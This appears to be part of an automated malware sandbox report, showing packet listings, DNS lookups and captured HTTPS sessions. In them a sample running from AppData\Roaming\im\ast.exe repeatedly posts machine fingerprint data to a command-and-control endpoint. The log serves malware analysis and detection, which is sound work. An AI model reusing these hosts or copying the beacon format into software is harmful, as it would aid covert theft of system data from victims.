                                                                                                                                Nov 19, 2024 18:56:49.806767941 CET44350130212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:49.807356119 CET50130443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.808454990 CET50130443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.808487892 CET44350130212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:49.808567047 CET50130443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.808587074 CET44350130212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:49.808618069 CET44350130212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:49.808635950 CET50130443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.808666945 CET50130443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.820394993 CET50133443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.820461035 CET44350133212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:49.820528984 CET50133443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.821043015 CET50133443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.821079969 CET44350133212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:50.649952888 CET44350133212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:50.650041103 CET50133443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:50.651292086 CET50133443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:50.651328087 CET44350133212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:50.651731014 CET44350133212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:50.652354002 CET50133443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:50.652594090 CET50133443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:50.652642012 CET44350133212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:50.652703047 CET50133443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:50.652812958 CET44350133212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:50.652857065 CET44350133212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:50.652915001 CET50133443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:50.653068066 CET50133443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:50.660681963 CET50136443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:50.660732985 CET44350136212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:50.660798073 CET50136443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:50.661150932 CET50136443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:50.661165953 CET44350136212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:51.368794918 CET44350136212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:51.368874073 CET50136443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:51.370126009 CET50136443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:51.370132923 CET44350136212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:51.370392084 CET44350136212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:51.371476889 CET50136443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:51.371707916 CET50136443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:51.371733904 CET44350136212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:51.371776104 CET50136443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:51.371819973 CET44350136212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:51.371848106 CET44350136212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:51.371891975 CET50136443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:51.371908903 CET50136443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:51.378391027 CET50139443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:51.378417015 CET44350139212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:51.378768921 CET50139443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:51.379244089 CET50139443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:51.379259109 CET44350139212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.088717937 CET44350139212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.088797092 CET50139443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.090204000 CET50139443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.090213060 CET44350139212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.090460062 CET44350139212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.091175079 CET50139443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.091442108 CET50139443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.091474056 CET44350139212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.091571093 CET44350139212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.091594934 CET50139443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.091599941 CET44350139212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.091612101 CET44350139212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.091639996 CET50139443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.091670990 CET50139443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.091732025 CET50139443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.106249094 CET50142443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.106285095 CET44350142212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.106435061 CET50142443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.107271910 CET50142443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.107287884 CET44350142212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.904845953 CET44350142212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.905117035 CET50142443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.906124115 CET50142443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.906136036 CET44350142212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.906466961 CET44350142212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.907533884 CET50142443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.907533884 CET50142443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.907618046 CET50142443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.907630920 CET44350142212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.907768011 CET44350142212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.907803059 CET44350142212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.907892942 CET50142443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.907892942 CET50142443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.914657116 CET50145443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.914706945 CET44350145212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.914880991 CET50145443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.915148020 CET50145443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:03.346431017 CET44350175212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:03.346532106 CET44350175212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:03.346573114 CET44350175212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:03.346745014 CET50175443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:03.346842051 CET50175443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:03.711065054 CET50178443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:03.711097002 CET44350178212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:03.711472988 CET50178443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:03.712064981 CET50178443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:03.712088108 CET44350178212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:04.625700951 CET44350178212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:04.625993013 CET50178443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:04.627180099 CET50178443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:04.627185106 CET44350178212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:04.627429008 CET44350178212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:04.628146887 CET50178443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:04.629214048 CET50178443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:04.629245996 CET44350178212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:04.629338026 CET44350178212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:04.629363060 CET50178443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:04.629364014 CET44350178212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:04.629373074 CET44350178212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:04.629405975 CET50178443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:04.629482031 CET50178443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:04.629482031 CET50178443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:04.639210939 CET50181443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:04.639267921 CET44350181212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:04.639496088 CET50181443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:04.640136003 CET50181443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:04.640156031 CET44350181212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:05.352483988 CET44350181212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:05.352643013 CET50181443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:05.353913069 CET50181443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:05.353924990 CET44350181212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:05.354154110 CET44350181212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:05.355797052 CET50181443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:05.356637001 CET50181443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:05.356637001 CET50181443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:05.356667995 CET44350181212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:05.356756926 CET44350181212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:05.356781006 CET44350181212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:05.356827974 CET50181443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:05.356853008 CET50181443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:05.452207088 CET50184443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:05.452270031 CET44350184212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:05.452455044 CET50184443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:05.452939987 CET50184443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:05.452955961 CET44350184212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:06.200073957 CET44350184212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:06.200181007 CET50184443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:06.593000889 CET50184443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:06.593034983 CET44350184212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:06.594007015 CET44350184212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:06.595134020 CET50184443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:06.596398115 CET50184443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:06.596471071 CET44350184212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:06.596664906 CET50184443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:06.596811056 CET44350184212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:06.596877098 CET50184443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:06.614372015 CET50187443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:06.614460945 CET44350187212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:06.614798069 CET50187443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:06.615560055 CET50187443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:06.615576029 CET44350187212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:08.340353012 CET44350187212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:08.340462923 CET50187443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:08.342298031 CET50187443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:08.342315912 CET44350187212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:08.342674971 CET44350187212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:08.344506025 CET50187443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:08.348150015 CET50187443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:08.348193884 CET44350187212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:08.348345041 CET44350187212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:08.348380089 CET44350187212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:08.348429918 CET50187443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:08.595267057 CET50187443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:08.651210070 CET50190443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:08.651302099 CET44350190212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:08.651386023 CET50190443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:08.652343035 CET50190443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:08.652379990 CET44350190212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:09.499391079 CET44350190212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:09.499486923 CET50190443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:12.084408045 CET50190443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:12.084454060 CET44350190212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:12.084954977 CET44350190212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:12.085752010 CET50190443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:12.086649895 CET50190443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:12.086668968 CET44350190212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:12.087124109 CET50190443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:12.087182045 CET50190443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:12.087276936 CET44350190212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:12.087321997 CET44350190212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:12.087369919 CET50190443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:12.087389946 CET50190443192.168.2.4212.193.169.65
                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Nov 19, 2024 18:56:11.422700882 CET5635753192.168.2.41.1.1.1
                                                                                                                                Nov 19, 2024 18:56:11.430294037 CET53563571.1.1.1192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:32.253089905 CET6346353192.168.2.41.1.1.1
                                                                                                                                Nov 19, 2024 18:56:32.260734081 CET53634631.1.1.1192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:32.261862993 CET5650953192.168.2.41.1.1.1
                                                                                                                                Nov 19, 2024 18:56:32.309228897 CET53565091.1.1.1192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:32.437783003 CET6082453192.168.2.41.1.1.1
                                                                                                                                Nov 19, 2024 18:56:32.460732937 CET53608241.1.1.1192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:37.373982906 CET5064953192.168.2.41.1.1.1
                                                                                                                                Nov 19, 2024 18:56:37.417490005 CET53506491.1.1.1192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:42.413002014 CET6112653192.168.2.41.1.1.1
                                                                                                                                Nov 19, 2024 18:56:42.450165033 CET53611261.1.1.1192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:47.364444971 CET6286053192.168.2.41.1.1.1
                                                                                                                                Nov 19, 2024 18:56:47.394306898 CET53628601.1.1.1192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.402069092 CET5901453192.168.2.41.1.1.1
                                                                                                                                Nov 19, 2024 18:56:52.753168106 CET53590141.1.1.1192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:57.404206038 CET5250753192.168.2.41.1.1.1
                                                                                                                                Nov 19, 2024 18:56:57.438035011 CET53525071.1.1.1192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:02.379303932 CET5390753192.168.2.41.1.1.1
                                                                                                                                Nov 19, 2024 18:57:02.404982090 CET53539071.1.1.1192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:07.419150114 CET5518953192.168.2.41.1.1.1
                                                                                                                                Nov 19, 2024 18:57:08.366883039 CET53551891.1.1.1192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 19, 2024 18:56:11.422700882 CET | 192.168.2.4 | 1.1.1.1 | 0xe3ee | Standard query (0) | id.xn--80akicokc0aablc.xn--p1ai | A (IP address) | IN (0x0001) | false
Nov 19, 2024 18:56:32.253089905 CET | 192.168.2.4 | 1.1.1.1 | 0xe82 | Standard query (0) | id.xn--80akicokc0aablc.xn--p1ai | A (IP address) | IN (0x0001) | false
Nov 19, 2024 18:56:32.261862993 CET | 192.168.2.4 | 1.1.1.1 | 0x93d | Standard query (0) | trs011.xn--80akicokc0aablc.xn--p1ai | A (IP address) | IN (0x0001) | false
Nov 19, 2024 18:56:32.437783003 CET | 192.168.2.4 | 1.1.1.1 | 0x64f2 | Standard query (0) | crypto-st.art | A (IP address) | IN (0x0001) | false
Nov 19, 2024 18:56:37.373982906 CET | 192.168.2.4 | 1.1.1.1 | 0x951 | Standard query (0) | crypto-st.art | A (IP address) | IN (0x0001) | false
Nov 19, 2024 18:56:42.413002014 CET | 192.168.2.4 | 1.1.1.1 | 0x8a98 | Standard query (0) | crypto-st.art | A (IP address) | IN (0x0001) | false
Nov 19, 2024 18:56:47.364444971 CET | 192.168.2.4 | 1.1.1.1 | 0xe046 | Standard query (0) | crypto-st.art | A (IP address) | IN (0x0001) | false
Nov 19, 2024 18:56:52.402069092 CET | 192.168.2.4 | 1.1.1.1 | 0xf228 | Standard query (0) | crypto-st.art | A (IP address) | IN (0x0001) | false
Nov 19, 2024 18:56:57.404206038 CET | 192.168.2.4 | 1.1.1.1 | 0x1a8 | Standard query (0) | crypto-st.art | A (IP address) | IN (0x0001) | false
Nov 19, 2024 18:57:02.379303932 CET | 192.168.2.4 | 1.1.1.1 | 0xd8cf | Standard query (0) | crypto-st.art | A (IP address) | IN (0x0001) | false
Nov 19, 2024 18:57:07.419150114 CET | 192.168.2.4 | 1.1.1.1 | 0xede9 | Standard query (0) | crypto-st.art | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 19, 2024 18:56:11.430294037 CET | 1.1.1.1 | 192.168.2.4 | 0xe3ee | No error (0) | id.xn--80akicokc0aablc.xn--p1ai | | 212.193.169.65 | A (IP address) | IN (0x0001) | false
Nov 19, 2024 18:56:32.260734081 CET | 1.1.1.1 | 192.168.2.4 | 0xe82 | No error (0) | id.xn--80akicokc0aablc.xn--p1ai | | 212.193.169.65 | A (IP address) | IN (0x0001) | false
Nov 19, 2024 18:56:32.309228897 CET | 1.1.1.1 | 192.168.2.4 | 0x93d | No error (0) | trs011.xn--80akicokc0aablc.xn--p1ai | | 195.19.105.66 | A (IP address) | IN (0x0001) | false
Nov 19, 2024 18:56:32.460732937 CET | 1.1.1.1 | 192.168.2.4 | 0x64f2 | Name error (3) | crypto-st.art | none | none | A (IP address) | IN (0x0001) | false
Nov 19, 2024 18:56:37.417490005 CET | 1.1.1.1 | 192.168.2.4 | 0x951 | Name error (3) | crypto-st.art | none | none | A (IP address) | IN (0x0001) | false
Nov 19, 2024 18:56:42.450165033 CET | 1.1.1.1 | 192.168.2.4 | 0x8a98 | Name error (3) | crypto-st.art | none | none | A (IP address) | IN (0x0001) | false
Nov 19, 2024 18:56:47.394306898 CET | 1.1.1.1 | 192.168.2.4 | 0xe046 | Name error (3) | crypto-st.art | none | none | A (IP address) | IN (0x0001) | false
Nov 19, 2024 18:56:52.753168106 CET | 1.1.1.1 | 192.168.2.4 | 0xf228 | Name error (3) | crypto-st.art | none | none | A (IP address) | IN (0x0001) | false
Nov 19, 2024 18:56:57.438035011 CET | 1.1.1.1 | 192.168.2.4 | 0x1a8 | Name error (3) | crypto-st.art | none | none | A (IP address) | IN (0x0001) | false
Nov 19, 2024 18:57:02.404982090 CET | 1.1.1.1 | 192.168.2.4 | 0xd8cf | Name error (3) | crypto-st.art | none | none | A (IP address) | IN (0x0001) | false
Nov 19, 2024 18:57:08.366883039 CET | 1.1.1.1 | 192.168.2.4 | 0xede9 | Name error (3) | crypto-st.art | none | none | A (IP address) | IN (0x0001) | false
                                                                                                                                • id.xn--80akicokc0aablc.xn--p1ai:443
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49836 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:13 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
                                                                                                                                2024-11-19 17:56:13 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49844 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:14 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:14 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49852 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:14 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:14 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.
2024-11-19 17:56:14 UTC | 403 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.19045) x64


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49860 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:15 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:15 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49884 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:18 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:18 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49897 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:19 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
